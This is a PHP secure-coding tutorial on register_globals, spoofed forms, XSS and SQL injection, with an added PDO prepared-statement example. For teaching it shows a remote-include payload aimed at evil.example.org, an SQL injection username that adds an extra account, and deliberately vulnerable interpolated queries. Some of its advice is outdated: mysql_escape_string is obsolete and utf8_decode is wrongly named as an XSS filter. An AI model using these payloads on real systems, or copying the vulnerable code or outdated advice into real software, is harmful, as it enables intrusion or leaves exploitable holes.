PHP Coding Security
Security is one of the most important concerns for every web application developer, and most loopholes exist because of poor coding. The following sections discuss how to improve security and prevent attacks through proper coding.
Register Globals
register_globals is disabled by default in PHP versions 4.2.0 and onwards due to a security risk. Therefore, you should always develop and deploy applications with register_globals disabled.
It becomes a problem when a file is included from a dynamic path, for example:
<?php
include "$path/script.php";
?>
With register_globals enabled, this page can be requested with ?path=http%3A%2F%2Fevil.example.org%2F%3F in the query string, which turns the include above into the following:
<?php
include 'http://evil.example.org/?/script.php';
?>
This includes the output of http://evil.example.org/ just as if it were a local file. It is a major security vulnerability, and one that has been discovered in some popular open source applications. Read request data explicitly from $_POST and $_GET instead of relying on register_globals.
Spoofed Form Submissions
A form does not have to be served by your own server in order to be submitted to it: anyone can submit a form to your server from any other location. Imagine a form located at http://example.org/form.html:
<form action="/process.php" method="POST">
<select name="color">
<option value="red">red</option>
<option value="green">green</option>
<option value="blue">blue</option>
</select>
<input type="submit" />
</form>
Imagine a potential attacker who saves this HTML and modifies it as follows:
<form action="http://example.org/process.php" method="POST">
<select name="color">
<option value="blue">blue</option>
</select>
<input type="submit" />
</form>
This new form can be hosted anywhere and manipulated as desired; because the action attribute now uses an absolute URL, the POST request is still sent to the same place. Client-side restrictions such as the fixed option list are therefore trivial to bypass. Always validate form data on the server side.
Cross-Site Scripting
Cross-Site Scripting (XSS) is one of the most common security vulnerabilities in web applications, and many popular open source PHP applications suffer from recurring XSS vulnerabilities. XSS arises whenever you display content from an external source without filtering it properly.
XSS can be prevented by:
- Filter all external data - Always validate all external data as it enters and exits your application. Proper filtering mitigates the majority of XSS concerns.
- Use existing functions - PHP has several excellent built-in filtering functions. Functions like htmlentities(), strip_tags(), and utf8_decode() can be useful. A native PHP function executes much faster than hand-written filtering logic, and it has been widely tested, so it is less likely to contain errors that yield vulnerabilities.
SQL Injection
SQL injection attacks are simple to defend against, but many applications are still vulnerable. Consider the following SQL statement:
<?php
$sql = "INSERT
INTO users (reg_username,
reg_password,
reg_email)
VALUES ('{$_POST['reg_username']}',
'$reg_password',
'{$_POST['reg_email']}')";
?>
Assume that this query creates a new account. The user provides a desired username and an email address, and the registration application generates a temporary password and emails it to the user to verify the address. Now imagine that the user enters the following as a username: bad_guy', 'mypass', ''), ('good_guy
This does not look like a valid username, but without proper filtering the query is built as shown below and creates two accounts:
<?php
$sql = "INSERT
INTO users (reg_username,
reg_password,
reg_email)
VALUES ('bad_guy', 'mypass', ''), ('good_guy',
'1234',
'shiflett@php.net')";
?>
SQL injection can be prevented by filtering the data and escaping it (for example with mysql_escape_string()) before it is placed in a query.
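As an added example that is not from the original article, the registration INSERT above is shown in its interpolated form beside a PDO prepared statement, which fixes the query structure before any user data is supplied (a different technique from the escaping named above). It assumes an in-memory SQLite database so that it runs offline; the crafted username is the constructed input from the text.

```php
<?php
// Added example, not from the original article: the registration INSERT
// rewritten with a PDO prepared statement. Assumes an in-memory SQLite
// database so it runs offline; a real application would use its own DSN.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (reg_username TEXT, reg_password TEXT, reg_email TEXT)');

// Constructed input: the crafted username from the article plus a normal email.
$post = [
    'reg_username' => "bad_guy', 'mypass', ''), ('good_guy",
    'reg_email'    => 'user@example.com',
];
$reg_password = bin2hex(random_bytes(8)); // temporary password, as in the article

// Vulnerable form, kept for comparison: user data is interpolated into the SQL
// text, so the quotes and parentheses in the username become part of the query.
function insertUnsafe(PDO $pdo, array $post, string $reg_password): int
{
    $sql = "INSERT INTO users (reg_username, reg_password, reg_email)
            VALUES ('{$post['reg_username']}', '$reg_password', '{$post['reg_email']}')";
    return $pdo->exec($sql); // number of rows the statement inserted
}

// Hardened form: placeholders fix the query structure up front and the values
// are sent separately, so nothing inside them can be parsed as SQL.
function insertSafe(PDO $pdo, array $post, string $reg_password): int
{
    $stmt = $pdo->prepare(
        'INSERT INTO users (reg_username, reg_password, reg_email) VALUES (:u, :p, :e)'
    );
    $stmt->execute([
        ':u' => $post['reg_username'],
        ':p' => $reg_password,
        ':e' => $post['reg_email'],
    ]);
    return $stmt->rowCount();
}

echo "interpolated query inserted ", insertUnsafe($pdo, $post, $reg_password), " row(s)\n";
$pdo->exec('DELETE FROM users');
echo "prepared statement inserted ", insertSafe($pdo, $post, $reg_password), " row(s)\n";

// With the prepared statement the crafted string is stored verbatim as one username.
$stored = $pdo->query('SELECT reg_username FROM users')->fetchColumn();
echo "stored username: ", $stored, "\n";
```

Comparing the two row counts shows the interpolated query being reshaped by the input while the prepared statement stores the same input as plain data.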
A Useful Reference
To learn more about PHP security, it is advised to read the book, Essential PHP Security by Chris Shiflett.
